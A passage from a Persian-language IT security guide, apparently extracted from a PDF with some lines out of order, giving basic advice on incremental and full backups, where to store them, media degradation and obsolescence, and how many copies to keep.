‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺷﻤﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻣﺘﻨﺎﻭﺑﹰﺎ‬
‫ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﻭﻟﻲ ﺩﺭ ﻓﺎﺻﻠﻪﻫـﺎﻱ‬
‫ﻛﻮﺗﺎﻩ ﻓﻘﻂ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻛﻨﻴـﺪ ﻛـﻪ‬
‫ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﻧـﻮﻉ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ‪ ٢٢‬ﻣﻲ ﮔﻮﻳﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ‬
‫ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺑــﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﻓﺎﻳﻠﻬــﺎ ﺩﺭ ﺍﻳـﻦ ﻧــﻮﻉ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻫﻢ ﺑﻪ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﻛﺎﻣﻞ ﻭ ﻫﻢ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳـﺸﻲ‬
‫ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪.‬‬
‫‪Compatibility‬‬
‫‪Incremental Backup‬‬
‫‪21‬‬
‫‪22‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻛﺠﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ؟‬
‫ﭘﺎﺳﺦ ﺍﻳﻦ ﺳﺆﺍﻝ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻟﻴﻞ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ‬
‫ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺳﺮﻗﺖ ﻭ ﻳﺎ ﺁﺗﺶﺳﻮﺯﻱ ﺍﺳﺖ ﻣﺤﻞ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻧﺒﺎﻳﺪ ﻧﺰﺩﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺟﺎﻳﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﻳـﻦ‬
‫ﻣﺸﻜﻼﺕ ﺍﺯ ﺣﻔﺎﻇﺖ ﻛﺎﻣﻞ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ‪ .‬ﻭﻟـﻲ ﺍﮔـﺮ ﺗﻬﻴـﺔ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻓﻘﻂ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺎﻙ ﺷﺪﻩ ﻳﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ‬
‫ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ ،‬ﺑﺎﻳـﺪ ﻣﺤـﻞ ﺁﻥ ﻃـﻮﺭﻱ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ﻛـﻪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺁﺳﺎﻥ ﺑﺎﺷﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻩ ﺣﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣﻞ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤـﻞ‬
‫ﺍﻣﻦ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺩﺭ ﻣﺤﻠﻲ ﻧﺰﺩﻳﻚ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺭﺍﻩ‬
‫ﺩﻳﮕﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺟﺪﻳﺪﺗﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪﺷـﺪﻩ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬـﺎﻱ ﺍﻣـﻦﺗـﺮ‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﻭ ﻧﺴﺨﻪ ﺗﻬﻴـﻪ ﻣـﻲﻛﻨﻨـﺪ ﻭ‬
‫ﻳﻚ ﻧﺴﺨﻪ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﻭﺭ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ‬
‫ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﺳﺎﺭﻗﺎﻥ ﻗﺼﺪ ﺳﺮﻗﺖ ﺁﻧﻬﺎ‬
‫ﺭﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﺎ ﺳـﺮﻗﺖ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻫﻤـﺎﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑﺪﺳـﺖ‬
‫ﺁﻭﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ‬
‫ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪.‬‬
‫ﺁﻳﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ؟‬
‫ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻨﮕـﺎﻡ ﻧﻴـﺎﺯ ﻧﺘﻮﺍﻧﻴـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ‬
‫ﺗﻬﻴﻪﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬
‫•‬
‫ﻧﺴﺨﺔ ﻣﺮﺑﻮﻃﻪ ﺑﺴﻴﺎﺭ ﻛﻬﻨﻪ ﻭ ﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺻﺪﻣﻪ‬
‫ﺩﻳﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺑﺮﻭﺯ ﺍﻳـﻦ ﻣـﺸﻜﻞ ﺩﺭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓﻼﭘـﻲ ﻭ‬
‫ﺭﺳﺎﻧﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ‪.‬‬
‫•‬
‫ﺩﺳﺘﮕﺎﻫﻲ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻥ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺍﺭﺍﻱ‬
‫ﺍﺷﻜﺎﻝ ﺑـﻮﺩﻩ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺩﺍﺩﺓ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺭ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺳﺎﺯﮔﺎﺭﻱ‪ ٢١‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑـﺮ‬
‫ﻋﻬــﺪﻩ ﺩﺍﺭﻧــﺪ )ﻣﺜــﻞ ﺍﻧــﻮﺍﻉ ﻓﺎﻳﻠﻬــﺎﻱ ﺗﻨﻈﻴﻤــﺎﺕ ﻭ ﭘﻴﻜﺮﺑﻨــﺪﻱ(‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﮔﺮﺩﺩ‪ .‬ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺁﻧﻬﺎ ﺑـﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﺑـﺪﻭﻥ‬
‫ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﭼﻨـﺪ ﺷـﺎﺧﻪ ﺍﺻــﻠﻲ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ‬
‫ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻳﻜﺘﺎ ﻭ ﺍﺧﺘﺼﺎﺻﻲ ﺷﻤﺎ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﻻ‬
‫ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮ ﺩﺭ ﻣـﻮﺭﺩ ﭼﮕـﻮﻧﮕﻲ ﺗﻬﻴـﻪ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪٦٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺘﻮﺍﻥ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ‬
‫ﺧﻮﺍﻧﺪ‪.‬‬
‫•‬
‫ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺩﭼـﺎﺭ‬
‫ﻧﻘﺺ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻧﻘﺺ ﺭﺳﺎﻧﻪ ﺩﺭ ﺩﻳﺴﻜﻬﺎﻱ ﻓﻼﭘﻲ‬
‫ﺍﺷﻜﺎﻝ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺠﻲ ﺑﻮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺗﻨﻬﺎ‬
‫ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﻪ ﺷﺪﻥ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻣـﻲﺷـﺪ‬
‫ﭼﻨﺪﺍﻥ ﺗﻌﺠﺐ ﻛﺴﻲ ﺭﺍ ﺑـﺮ ﻧﻤـﻲﺍﻧﮕﻴﺨـﺖ‪ .‬ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﻓﺸﺮﺩﻩ ﺑﻌﻨـﻮﺍﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﻣﺎﻧـﺪﮔﺎﺭﺗﺮ ﺷـﻬﺮﺕ‬
‫ﺩﺍﺷﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻳـﻚ ﻣﻄﺎﻟﻌـﻪ ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﻧـﺸﺎﻥ ﺩﺍﺩ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩﺍﻱ ﻛﻪ ﻛﻴﻔﻴﺖ ﭼﻨﺪﺍﻥ ﻣﻄﻠﻮﺑﻲ ﻧﺪﺍﺭﻧـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌـﺪ ﺍﺯ ﮔﺬﺷـﺖ ﺣـﺪﻭﺩ ﺩﻭ ﺳـﺎﻝ ﺍﺯ ﺯﻣـﺎﻥ‬
‫ﻧﻮﺷﺘﻪﺷﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺷﻮﻧﺪ‪.‬‬
‫ﺧﻮﺍﻧﺪﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻫﻲ ﻏﻴﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﻧﺴﺨﺔ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺁﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﻛﻨﺘﺮﻝ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺍﺯ ﺻﺤﺖ ﺭﺳﺎﻧﺔ ﺣﺎﻭﻱ ﻧـﺴﺨﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺳـﺖ‪ .‬ﺩﻗـﺖ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ‬
‫ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙ ﻛـﺮﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲ ﻛﻨﻴـﺪ )ﻣﺜـﻞ ﺩﻳـﺴﻜﻬﺎﻱ ‪ Zip‬ﻭ‬
‫ﻓﻼﭘﻲ(‪ ،‬ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮ ﻭ ﺗﻤﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺕ ﺑـﺴﻴﺎﺭ ﻃـﻮﻻﻧﻲ ﻧﮕـﻪ‬
‫ﻣﻲﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺳﺆﺍﻝ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﺍﺯ‬
‫ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﺍﺳﻨﺎﺩ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‬
‫ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؟ ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﻃـﻮﻻﻧﻲ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﺯ ﺭﺩﻩ ﺧـﺎﺭﺝ ﺷـﺪﻥ‬
‫ﺭﺳﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﺩﺍﺩﻩﺍﻱ ﺩﺭ ﻳﻚ‬
‫ﻓﻼﭘﻲ ﭘﻨﺞ ﺍﻳﻨﭽﻲ ﻛﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۰‬ﺭﺍﻳﺞ ﺑـﻮﺩﻩ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ‬
‫ﺑﺎﺷﺪ ﺁﻳﺎ ﺍﻣﺮﻭﺯ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﭘـﻨﺞ ﺍﻳﻨﭽـﻲ‬
‫ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺁﻥ ﭘﻴﺪﺍ ﻛﺮﺩ؟‬
‫ﭼﻨﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ؟‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻫﻔﺘﻪ ﺍﻱ ﻳﻜﺒﺎﺭ ﺍﺯ ﺁﻧﭽـﻪ ﺩﺍﺭﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‬
‫ﺩﺭﺻﻮﺭﺕ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻓﺎﺟﻌﺔ ﻣﺼﻴﺒﺖﺑﺎﺭ‪ ،‬ﺣﺪﺍﻛﺜﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻳﻚ ﻫﻔﺘـﻪ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺧﻮﺍﻫﻴـﺪ ﺩﺍﺩ‪ .‬ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ‬
‫ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻭﻟﻲ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻓﻀﺎﻱ ﺍﺷﻐﺎﻝﺷﺪﻩ‬
‫ﺑﻮﺳﻴﻠﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﻣـﻲﺷـﻮﺩ‪ .‬ﭼـﻪ ﺗﻌـﺪﺍﺩ ﺍﺯ ﺍﻳـﻦ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺪ ﻧﮕﻪ ﺩﺍﺷﺖ؟ ﺍﮔﺮ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﻳﺎ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﻟﻴﻠﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺨﻮﺍﻫﻴـﺪ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺳﺮﻳﻊ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪ ،‬ﭼﻮﻥ ﺣﺠﻢ ﻛﻤـﻲ ﺩﺍﺭﻧـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﻫـﻢ ﻧﺪﺍﺭﻧـﺪ؛ ﺍﻣـﺎ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻳـﺪ ﭼﻨـﺪ ﻧـﺴﺨﻪ ﺍﺯ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﺩﺭ ﺗﻤﺎﻡ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﭼﻬـﺎﺭ‬
‫ﻧﺴﺨﺔ ﺁﺧﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪.‬‬
‫ﭼﺮﺍ ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﮕﻮﻧﻪ ﻋﻤﻞ ﺷﻮﺩ؟ ﭼﺮﺍ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﻣــﺎﻩ ﻗﺒــﻞ ﺭﺍ ﺩﺭ ﺷــﺮﺍﻳﻄﻲ ﻛــﻪ ﻧــﺴﺨﺔ ﺟﺪﻳــﺪﺗﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟ ﺩﻟﻴـﻞ ﺁﻥ ﺳـﺎﺩﻩ ﺍﺳـﺖ‪ :‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺴﺨﺔ‬
‫ﺁﺧﺮﻱ ﻛﻪ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ‪ ،‬ﮔﻢ ﺷﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺑﻪ‬
‫ﺳﺮﻗﺖ ﺭﻭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮﭼـﻪ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﻼ ﺑـﻪ ﺭﻭﺯ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﻭﻟـﻲ ﺑﻮﺩﻧـﺸﺎﻥ ﺑﻬﺘـﺮ ﺍﺯ‬
‫ﻣﺎﻫﻬﺎﻱ ﻗﺒﻠﻲ ﻛﺎﻣ ﹰ‬
‫ﻧﺒﻮﺩﻧﺸﺎﻥ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﻮﺭﺩ ﻳﻚ ﻣﺜﺎﻝ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻧﻜﺘـﻪ ﺍﺳـﺖ‬
‫ﻛﻪ ﺍﻳﻤﻨـﻲ ﺳـﻄﺢ ﺑـﺎﻻ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﭼﻨﺪﮔﺎﻧـﻪ ﻭ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬
‫ﺗﻜﺮﺍﺭﺷﺪﻩ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‬
‫ﺍﮔﺮ ﮔﻮﺍﻫﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺧﺮﻳﺪﺍﺭﻱ ﻛﺮﺩﻩﺍﻳـﺪ ﺍﻳـﻦ ﺍﺟـﺎﺯﻩ ﺭﺍ‬
‫ﻣﻲﺩﻫﺪ‪ ،‬ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻳـﻚ ﻧـﺴﺨﺔ‬
‫ﺛﺎﻧﻮﻳﻪ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻋﻤﻠﻴـﺎﺕ ﻧـﺼﺐ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻓﻮﺍﺻـﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ‪.‬‬
